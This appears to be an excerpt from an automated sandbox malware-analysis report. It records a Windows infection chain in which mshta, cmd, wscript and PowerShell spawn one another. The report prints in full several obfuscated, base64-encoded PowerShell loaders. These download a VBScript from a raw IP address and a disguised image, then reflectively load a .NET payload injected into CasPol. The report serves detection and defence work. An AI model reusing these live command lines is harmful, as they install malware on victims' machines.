Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: iviwipiqdnlib.dotnet.mdrawpropertyptrrowirisdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: q:C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.pdb source: powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2515686581.00000000068D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2518375278.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
